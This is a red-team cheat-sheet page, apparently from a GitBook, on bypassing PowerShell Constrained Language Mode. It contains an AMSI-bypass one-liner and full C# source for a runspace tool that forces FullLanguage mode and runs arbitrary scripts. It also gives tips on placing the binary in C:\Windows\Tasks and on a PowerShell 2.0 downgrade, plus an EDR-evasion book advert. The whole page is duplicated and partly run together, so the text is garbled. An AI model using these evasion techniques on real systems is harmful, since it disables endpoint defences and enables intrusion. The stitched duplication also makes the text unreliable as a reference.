PowerShell ConstrainedLanguage Mode, CLM

PS C:\Users\> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

AMSI bypass blocked

PS C:\Users\> [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').GetField('amsiInit'+'Failed','NonPublic,Static').SetValue($null,!$false)
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:1 char:1
+ [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').G ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage

Bypass - Runspace

Visual Studio project -Console App (.NET Framework) template. Add a reference to the System.Management.Automation namespace:

Project > Add Reference...

C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace ConstrainedLanguageExample
{
    internal class Program
    {
        static void Main(string[] args)
        {
            if (args.Length == 0) return;

            // Création du runspace avec le mode de langage défini explicitement à FullLanguage
            Runspace runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();

            // Définir explicitement le mode FullLanguage pour le runspace
            runspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;

            // Créer un objet PowerShell pour exécuter les scripts
            PowerShell ps = PowerShell.Create();
            ps.Runspace = runspace;

            // Ajouter la commande PowerShell à exécuter
            ps.AddScript(String.Join(" ", args));

            // Exécuter la commande
            Collection<PSObject> results = ps.Invoke();

            // Afficher les résultats
            foreach (PSObject obj in results)
            {
                Console.WriteLine(obj.ToString());
            }

            runspace.Close();
        }
    }
}

User Access Control (UAC)

copy binary to C:\Windows\Tasks.

Same method as PowerPick but it is flagged by defender

Downgrading to PowerShell 2.0

Force a downgrade with the -version flag

powershell -version 2

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Evading EDR: The Definitive Guide to Defeating Endpoint Detection Systems The author uses his years of experience as a red team operator to investigate each of the most common sensor components, discussing their purpose, explaining their implementation, and showing the ways they collect various data points from the Microsoft operating system. In addition to covering the theory behind designing an effective EDR, each chapter also reveals documented evasion strategies for bypassing EDRs that red teamers can use in their engagements.

PreviousLOLBAS / LOLDrivers / LOLESXi NextVBScript

Last updated 24 days ago

PS C:\Users\> [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').GetField('amsiInit'+'Failed','NonPublic,Static').SetValue($null,!$false) Cannot invoke method. Method invocation is supported only on core types in this language mode. At line:1 char:1 + [Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils').G ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage

Bypass - Runspace

Visual Studio project -Console App (.NET Framework) template. Add a reference to the System.Management.Automation namespace:

Project > Add Reference...

C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace ConstrainedLanguageExample
{
    internal class Program
    {
        static void Main(string[] args)
        {
            if (args.Length == 0) return;

            // Création du runspace avec le mode de langage défini explicitement à FullLanguage
            Runspace runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();

            // Définir explicitement le mode FullLanguage pour le runspace
            runspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;

            // Créer un objet PowerShell pour exécuter les scripts
            PowerShell ps = PowerShell.Create();
            ps.Runspace = runspace;

            // Ajouter la commande PowerShell à exécuter
            ps.AddScript(String.Join(" ", args));

            // Exécuter la commande
            Collection<PSObject> results = ps.Invoke();

            // Afficher les résultats
            foreach (PSObject obj in results)
            {
                Console.WriteLine(obj.ToString());
            }

            runspace.Close();
        }
    }
}

User Access Control (UAC)

copy binary to C:\Windows\Tasks.

Same method as PowerPick but it is flagged by defender

Downgrading to PowerShell 2.0

Force a downgrade with the -version flag

powershell -version 2

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Evading EDR: The Definitive Guide to Defeating Endpoint Detection Systems The author uses his years of experience as a red team operator to investigate each of the most common sensor components, discussing their purpose, explaining their implementation, and showing the ways they collect various data points from the Microsoft operating system. In addition to covering the theory behind designing an effective EDR, each chapter also reveals documented evasion strategies for bypassing EDRs that red teamers can use in their engagements.